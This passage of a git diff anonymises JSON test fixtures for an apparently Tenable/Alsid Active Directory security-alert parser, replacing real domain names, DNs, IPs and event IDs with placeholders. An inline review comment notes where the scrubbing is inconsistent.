@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain\" \"2008125\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"79016668\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#URDOM-APP-RSAT-TEST\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-GPO-EXEC-SANITY\" \"high\" \"CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain\" \"2008000\" \"2\" \n\"R-GPO-EXEC-SANITY-UNKNOWN-CSE\" \"790160000\" \"CseGuid\"=\"{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}\" \"AttributeName\"=\"GpcMachineExtensionName\" \"GpoName\"=\"#TEST-APP-RSAT-TEST\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-GPO-EXEC-SANITY-UNKNOWN-CSE", "properties": { - "ADdevianceID": 2008125, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2008000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN={3D4A6260-9D6C-4062-B56B-DC6D419333CE},CN=Policies,CN=System,DC=urdom,DC=ad,DC=domain", + "ADobject": "CN={3D4A6260-9000-4000-B000-DC6D41900000},CN=Policies,CN=System,DC=test,DC=ad,DC=domain", "AttributeName": "GpcMachineExtensionName", "CseGuid": "{8472c2c4-6b70-4301-a20d-a6cea5f82b7e}", - "GpoName": "#URDOM-APP-RSAT-TEST", + "GpoName": "#TEST-APP-RSAT-TEST", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "79016668" + "eventID": "790160000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_obsolete_system.json b/Tenable/alsid/tests/alert_obsolete_system.json index 32e1efc05..69c282597 100644 --- a/Tenable/alsid/tests/alert_obsolete_system.json +++ b/Tenable/alsid/tests/alert_obsolete_system.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-SLEEPING-OBSOLETE-SYSTEMS", "properties": { - "ADdevianceID": 2007590, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2007000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=urdom,DC=ad,DC=domain", - "ComputerCn": "cnpsp16bd", + "ADobject": "CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=testDC,DC=ad,DC=domain", + "ComputerCn": "testComputerCN", "OperatingSystem": "Windows Server 2012 R2 Standard", "OperatingSystemVersion": "6.3 (9600)", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "78964369" + "eventID": "78964000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_pattern2.json b/Tenable/alsid/tests/alert_pattern2.json index 2364c0604..c514b9478 100644 --- a/Tenable/alsid/tests/alert_pattern2.json +++ b/Tenable/alsid/tests/alert_pattern2.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" }, "expected": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", "event": { "kind": "alert" }, 
@@ -13,13 +13,13 @@ "ADforestName": "foo.ad.com", "ADobject": "Suspicious DC Password Change", "alertID": 21, - "dc_ip": "10.17.92.40", - "dc_name": "HOSTNAME-040", + "dc_ip": "1.2.3.4", + "dc_name": "HOSTNAME-000", "eventID": "critical", "eventType": "Unknown", "field1": "Unknown", - "field2": "HOSTNAME-040", - "field3": "10.17.92.40", + "field2": "HOSTNAME-000", + "field3": "1.2.3.4", "password_renewal_duration": "30:04:30:05", "source_hostname": "Unknown", "source_ip": "Unknown", diff --git a/Tenable/alsid/tests/event_1.json b/Tenable/alsid/tests/event_1.json index 1f9418431..e12e5d53e 100644 --- a/Tenable/alsid/tests/event_1.json +++ b/Tenable/alsid/tests/event_1.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", "event": { "kind": "alert", "outcome": "success" 
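Review bot: The scrub in the new `message` is partial: `emea.corp` and the `ADobject` DN become `test.corp` / `DC=test`, but `PrivilegesPath` and `ParentContainer` still carry `DC=emae,DC=corp`, and the expected `properties` block in the next hunk mirrors the same split, so the fixture is now internally inconsistent. The same pattern appears in event_4.json, where the input's `ADobject` uses `OU=test_OU,…,DC=test_DC` while `ParentContainer` uses `OU=D000,…,DC=test`, and in ioe_security_alert4.json, where `eventID` stays `2434` while the sibling fixtures moved to `2400`. Using one placeholder per original value (`DC=test,DC=corp` and `OU=D000` everywhere in a file) keeps each fixture coherent and makes it easy to verify that nothing tenant-specific was left behind.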
@@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON", "properties": { - "ADdevianceID": 1958016, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", + "ADobject": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp", "PrivilegesPath": "CN=Adminintrator,CN=Users,DC=emae,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John DOE" } } diff --git a/Tenable/alsid/tests/event_2.json b/Tenable/alsid/tests/event_2.json index 9a09badeb..99cb8e395 100644 --- a/Tenable/alsid/tests/event_2.json +++ b/Tenable/alsid/tests/event_2.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,11 +13,11 @@ "outcome": "success", "outcome_reason": "R-DELEG-PRIVUSERS-NOT-PROTECTED", "properties": { - "ADdevianceID": 1920595, - "ADdomainName": "emea.corp", + "ADdevianceID": 1920000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp", - "PrivilegesPath": "CN=Backup,CN=Builtin,DC=emea,DC=corp", + "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp", + "PrivilegesPath": "CN=Backup,CN=Builtin,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", "eventID": "50666797" 
diff --git a/Tenable/alsid/tests/event_3.json b/Tenable/alsid/tests/event_3.json index 2611ce026..040246618 100644 --- a/Tenable/alsid/tests/event_3.json +++ b/Tenable/alsid/tests/event_3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,14 +13,14 @@ "outcome": "success", "outcome_reason": "R-NOT-IN-WHITELIST", "properties": { - "ADdevianceID": 1959337, - "ADdomainName": "emea.corp", + "ADdevianceID": 1959000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "CN=Main Administrators,CN=Users,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", - "eventID": "51204253" + "eventID": "51200000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/event_4.json b/Tenable/alsid/tests/event_4.json index 418ddd8b1..d3deeae5d 100644 --- a/Tenable/alsid/tests/event_4.json +++ b/Tenable/alsid/tests/event_4.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON-ACROSS-TRUST", "properties": { - "ADdevianceID": 1958033, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John Doe" } } diff --git a/Tenable/alsid/tests/ioe_security_alert1.json b/Tenable/alsid/tests/ioe_security_alert1.json index b149081cb..dbe95b13a 100644 --- a/Tenable/alsid/tests/ioe_security_alert1.json +++ b/Tenable/alsid/tests/ioe_security_alert1.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"", "event": { "kind": "alert", "outcome": "success" @@ -14,13 +14,13 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", - "TrusteeCn": "GustavoFring", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", + "TrusteeCn": "JohnDoe", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert3.json b/Tenable/alsid/tests/ioe_security_alert3.json index abfdf8cc5..dd4f9ac7f 100644 --- a/Tenable/alsid/tests/ioe_security_alert3.json +++ b/Tenable/alsid/tests/ioe_security_alert3.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"", "event": { "kind": "alert", "outcome": "success" @@ -14,12 +14,12 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert4.json b/Tenable/alsid/tests/ioe_security_alert4.json index 4b340737e..6c89b301f 100644 --- a/Tenable/alsid/tests/ioe_security_alert4.json +++ b/Tenable/alsid/tests/ioe_security_alert4.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", "event": { "kind": "alert", "outcome": "success" @@ -14,9 +14,9 @@ "outcome_reason": "R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp", + "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp", "AttributeName": "inf-system_access-lockoutbadcount", "OuCn": "Packaging", "alertID": 1, diff --git a/Tenable/alsid/tests/trailflow_alert1.json b/Tenable/alsid/tests/trailflow_alert1.json index 2fa82823e..b41cd7fcc 100644 --- a/Tenable/alsid/tests/trailflow_alert1.json +++ b/Tenable/alsid/tests/trailflow_alert1.json 
